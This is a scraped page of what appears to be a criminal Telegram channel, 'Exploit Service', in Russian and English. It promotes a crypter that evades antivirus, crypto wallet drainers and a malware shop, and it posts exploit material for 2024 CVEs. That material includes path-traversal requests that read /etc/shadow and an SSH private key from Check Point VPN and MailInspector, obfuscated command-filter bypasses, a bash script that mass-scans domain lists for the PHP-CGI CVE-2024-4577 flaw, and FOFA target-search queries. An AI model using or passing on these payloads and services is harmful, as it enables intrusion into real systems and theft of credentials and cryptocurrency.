en
Feedback
Exploit Service

Exploit Service

Closed channel

Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Link: @exploitservice Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow

Show more
8 675
Subscribers
No data24 hours
-497 days
-20030 days
Posts Archive
🍄 Cryptli Service | 0-3/26 RU 🇷🇺
Особенности нашего сервиса: • Выдача по ссылке чистого exe, архив без пароля • Обход Windows Defender + Cloud • Оперативное оказание услуг - скорость и качество • Тестирование на подготовленных машинах без риска смерти стаба • Мы доводим дела до конца, без отстука никто не уйдет
Модули: • Автозапуск • Фейк-ошибки • Подмена PDF
Дополнительная услуга FTP | URL Прямая ссылка с траст доменом, обход Google Alert
EN 🇬🇧
Features of our service: • Issuance by link of a clean exe, archive without password • Windows Defender bypass + Cloud • Prompt delivery of services - speed and quality • Testing on prepared machines without the risk of stack death • We bring things to the end, no one leaves without tapping
Modules: • Autorun • Fake errors • PDF spoofing
• Optional service FTP | URL Direct link with trust domain, bypass Google Alert
Отзывы | Reviews (click) Контакты | Contacts: Саппорт/Support - @Cryptl1_support FTP Саппорт/Support - @Trustl1 Актуальные линки | Actual links (click) Канал | Channel (click) Чат | Chat (click)

CVE-2024-21512 MySQL2 Дырка в библиотеке MySQL для Node.js https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580 Private: @Exp
CVE-2024-21512 MySQL2 Дырка в библиотеке MySQL для Node.js https://security.snyk.io/vuln/SNYK-JS-MYSQL2-6861580 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-28397 js2py sandbox escape, bypass pyimport restriction https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Esc
CVE-2024-28397 js2py sandbox escape, bypass pyimport restriction https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

Drainer Market! We offer the most effective and reliable drainers for cryptocurrency transactions. As well as landing pages f
Drainer Market! We offer the most effective and reliable drainers for cryptocurrency transactions. As well as landing pages for their promotion. @DrainerMarketBot 15 % discounts with this promo code https://t.me/DrainerMarketBot?start=promo15

CVE-2024-34470 HSC MailInspector POC: GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd FOFA: title==
CVE-2024-34470 HSC MailInspector POC: GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd FOFA: title=="..:: HSC MailInspector ::.." Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

BYPASS cat ${HOME:0:1}etc${HOME:0:1}passwd `echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'` cat $(echo . | tr '!
BYPASS
cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps <(echo 2f6574632f706173737764)`
Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-30078.poc0.03 KB

photo content

CVE-2024-30078 win RCE wi-fi New Wi-Fi Takeover Attack—All Windows Users Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-4577 Argument Injection in PHP-CGI ДОПОЛНЕНИЕ к предыдущему посту BASH: #!/bin/bash # Function to check vulnerability for a domain check_vulnerability() { local domain=$1 local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \ -H "User-Agent: curl/8.3.0" \ -H "Accept: */*" \ -H "Content-Length: 23" \ -H "Content-Type: application/x-www-form-urlencoded" \ -H "Connection: keep-alive" \ --data "<?php phpinfo(); ?>" \ --max-time 10) if [[ $response == *"PHP Version"* ]]; then echo "$domain: Vulnerable" fi } # Main function to iterate over domains main() { local file=$1 while IFS= read -r domain || [ -n "$domain" ]; do check_vulnerability "$domain" done < "$file" } # Check if the file argument is provided if [ "$#" -ne 1 ]; then echo "Usage: $0 <domain_list_file>" exit 1 fi # Call the main function with the domain list file main "$1" * Сохраняйте скрипт и по списку доменов: ./CVE-2024-4577_script.sh /path/to/domains-list Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-4577 Argument Injection in PHP-CGI При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Win
CVE-2024-4577 Argument Injection in PHP-CGI При разработке PHP упустил из виду функцию преобразования символов Best-Fit в Windows. Когда PHP-CGI работает на платформе Windows и использует определенные кодовые страницы (упрощенный китайский 936, традиционный китайский 950, японский 932 и т. д.), атакующий может создавать вредоносные запросы для обхода исправления CVE-2012-1823. Это позволяет им выполнять произвольный код PHP без необходимости аутентификации. https://en.fofa.info/result?qbase64=YXBwPSJYQU1QUCI%3D (610,604 хостов) Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-27348 RCE в Apache HugeGraph Server Usage: python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute" https://github.com/kljunowsky/CVE-2024-27348 Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-27822 macOS PackageKit LPE Для версий: macOS 14.5 Beta 1 (23F5049f) and older macOS 13.6.6 (22G630) and older macOS 12.7.4 (21H1123) and older Any version of macOS 11 or older https://khronokernel.com/macos/2024/06/03/CVE-2024-27822.html https://khronokernel.com/Binaries/Apple%20PackageKit/pkg_exploit.py Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-36801 SemСms sql injection для версии Semcms v 4.8 https://hackyboiz.github.io/2024/06/05/pwndorei/2024-06-05/ Priva
CVE-2024-36801 SemСms sql injection для версии Semcms v 4.8 https://hackyboiz.github.io/2024/06/05/pwndorei/2024-06-05/ Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

Promo code: Promo20 Discount percentage: 20% Promo code activations: 0 times Maximum activations: 1 https://t.me/ExploitServiceBot?start=promoPromo20

Repost from N/a
OffSec-EXP-301-OSED 2023.zip2247.51 MB

Repost from N/a
OffSec — сертифицированное обучение разработчиков эксплойтов OSED 2023
OffSec — сертифицированное обучение разработчиков эксплойтов OSED 2023

CVE-2024-5326 WordPress Post Grid Gutenberg и плагин PostX = 4.1.2 User Contributor включает регистрацию новых пользователей и устанавливает роль по умолчанию для новых пользователей — Администратор. https://github.com/truonghuuphuc/CVE-2024-5326-Poc/blob/main/CVE-2024-5326.py Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-24919 Check Point Remote Access VPN 0-Day aCSHELL/../../../../../../../ home/admin/.ssh/id_rsa * ssh admin@Хостъ -i
CVE-2024-24919 Check Point Remote Access VPN 0-Day aCSHELL/../../../../../../../ home/admin/.ssh/id_rsa * ssh admin@Хостъ -i id_rsa Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport

CVE-2024-24919 Check Point Remote Access VPN 0-Day https://en.fofa.info/result?qbase64=YXBwPSJDaGVja19Qb2ludC1TU0wtTmV0d29yay
CVE-2024-24919 Check Point Remote Access VPN 0-Day https://en.fofa.info/result?qbase64=YXBwPSJDaGVja19Qb2ludC1TU0wtTmV0d29yay1FeHRlbmRlciI%3D POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks Angel Drainer: https://t.me/+p2mOn-eGo4UzMTEx Support: @angelsupport